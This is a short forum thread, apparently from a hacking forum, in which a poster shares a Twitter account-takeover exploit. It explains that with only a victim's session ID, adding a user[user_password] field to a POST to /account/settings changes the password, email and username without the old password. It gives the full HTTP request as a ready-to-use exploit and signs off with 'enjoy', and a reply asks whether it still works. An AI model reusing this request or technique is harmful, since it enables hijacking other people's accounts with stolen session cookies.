Twitter password change exploit

[adi003]

OK, so it wouldn't be fair if I asked all of you to post but didn't post anything myself.

Plus, if you took the bother to visit the forum and actually check it out, why not get something out of it?

So here's something I found the other day:

On Twitter, you have to specify your old password to change your email, your username, or your password, of course.

Vulnerability: just having the twitter session ID, it is possible the change all of these without knowing the actual password.

This is done by using the "user settings" interface instead of the one meant to change your password.

Just add an extra user[user_password] variable to the post, and voila.

Exploit:

POST /account/settings HTTP/1.1

Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, application/x-shockwave-flash, */*

Referer: Twitter

Accept-Language: hu-HU

User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3)

Content-Type: application/x-www-form-urlencoded

Accept-Encoding: gzip, deflate

Host: twitter.com

Content-Length: 366

Connection: Keep-Alive

Cache-Control: no-cache

Cookie: lang=en; _twitter_sess=session-id;

authenticity_token=f3c4667fd7b4231d279159af8ce76a85d06631b9&user%5Bname%5D=yourname&user%5Bscreen_name%5D=username&user%5Bemail%5D=whatever@yourmail.com&auth_password=&user%5Btime_zone%5D=Greenland&user%5Burl%5D=&user%5Bdescription%5D=&user%5Blocation%5D=&user%5Blang%5D=en&user%5Bprotected%5D=0&commit=Save&user%5Buser_password%5D=new_password

sursa

enjoy

[timalin]

Does it works on day ?